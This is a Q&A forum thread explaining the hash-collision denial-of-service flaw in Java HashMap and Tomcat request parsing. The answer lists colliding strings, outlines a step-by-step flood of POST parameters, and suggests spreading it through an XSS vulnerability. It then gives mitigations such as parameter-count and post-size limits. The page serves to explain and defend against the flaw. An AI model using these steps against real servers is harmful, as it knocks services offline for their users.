Application vulnerability due to Non Random Hash Functions

Sumit picture Sumit · Dec 29, 2011 · Viewed 14.3k times · Source

Below excerpt is from an article that explains possibility of Denial Of Service(DoS) attack because of non random hash functions used in Hash Data Structures.

[…] the condition can be leveraged by exploiting predictable collisions in the underlying hashing algorithms.

In order to verify it I went through reference implementation of Java HashMap from Oracle and indeed found a static hash functions used:

    static int hash(int h) {
       h ^= (h >>> 20) ^ (h >>> 12);
       return h ^ (h >>> 7) ^ (h >>> 4);
    }

Another paper on the topic tells:

A Tomcat 6.0.32 server parses a 2 MB string of colliding keys in about 44 minutes of i7 CPU time, so an attacker with about 6 kbit/s can keep one i7 core constantly busy. If the attacker has a Gigabit connection, he can keep about 100.000 i7 cores busy

How can we safeguard against this vulnerability. Moreover so with so many of softwares we use being open source (Tomcat etc.) which rely on this implementation.

Answer

Sripathi Krishnan picture Sripathi Krishnan · Dec 29, 2011

Understanding Attack Vector

How HashMaps work

Say a comment form on a blog accepts the parameters – first_name, last_name, comment – as post parameters. Internally, Tomcat stores these parameters as a HashMap.

The logical structure of this HashMap is like this -


"first_name" --> "Sripathi"
"last_name" --> "Krishnan"
"comment" ---> "DoS using poor Hashes"

But the physical structure is different. The keys are first converted into a hashCode, and then the hashCode is converted into an array index.

The ideal physical structure thus becomes -


0 --> "Sripathi"
1 --> "Krishnan"
2 --> "DoS using poor Hashes"

But the possible keys are infinite. So at some point, two keys will have the same hash code. This becomes a hash collision.

With collisions, the physical structure becomes :


0 --> "Sripathi", "Krishnan"
1 --> Empty
2 --> "DoS using poor hashes"

Hash Collisions and impact on performance

When you have hash collisions, inserting a new entry means iterating over all the elements in a single hash "bucket" sequentially just to find out if it already exists in the map. Inserting one element can approach O(n) complexity if all elements hash to the same value. Inserting n elements in this worst case makes it O(n*n) complexity.

In short : If you insert thousands of keys that have the same hashCode, the server will require a lot of CPU cycles.

How do you generate keys with the same Hash?

In Java, "Aa" and "BB" have the same hash code.

Because of a property called "Equivalent Substrings", we can generate several other strings with the same hashcode, just by starting with these 2 strings.

First Iteration : "AAAA", "AABb", "BbAA", "BbBb" have the same hash code

Now, we have 4 strings with the same hash code. We can permute them to generate 16 strings that will have the same hash code. For example :


"AaAaAaAa", "AaAaBBBB", "AaAaAaBB", "AaAaBBAa",
"BBBBAaAa", "BBBBBBBB", "BBBBAaBB", "BBBBBBAa",
"AaBBAaAa", "AaBBBBBB", "AaBBAaBB", "AaBBBBAa",
"BBAaAaAa", "BBAaBBBB", "BBAaAaBB", "BBAaBBAa",

All these 16 strings have the same hash code.

You can now take these 16 strings, and generate 256 strings that have the same hashcode.

In short : It is very easy to generate a large set of strings that will have the exact hash code.

How do you attack the server?

  1. Create thousands of string that have the same hash code (see above)
  2. Construct a POST request like this - AaAa=&AaBB=&BBAa=&BBBB= ....
  3. Submit the form
  4. Repeat in a loop, and create several threads so that all server resources are used up

Because this is just a POST request, an attacker can also use innocent browsers to attack a server. Just find a website with a cross site scripting vulnerability, embed code to make a POST request, and then use social engineering to spread the link to as many users as you can.

Prevention

In general, the underlying platform cannot fix this. This is considered to be a application framework problem. In other words, Tomcat has to fix this, not Oracle/Sun.

Possible fixes include :

  1. Restrict the number of POST parameters - Tomcat 6.0.35+ has a new parameter maxParameterCount. The default value is 10,000. The lower the better, as long as it does not break your functionality.

  2. Restrict the size of the POST request - For the attack to work, the Payload has to be huge. The default POST allowed by Tomcat is 2MB. Reducing this to say 200KB will reduce the effectiveness of this attack. The parameter in tomcat is maxPostSize

  3. Web Application Firewall - If you have a web application firewall, you can configure it to block requests that look suspicious. This is a reactive measure, but is nice to have in case you cannot use one of the above solutions.

FYI - Tomcat's documentation is here - http://tomcat.apache.org/tomcat-6.0-doc/config/http.html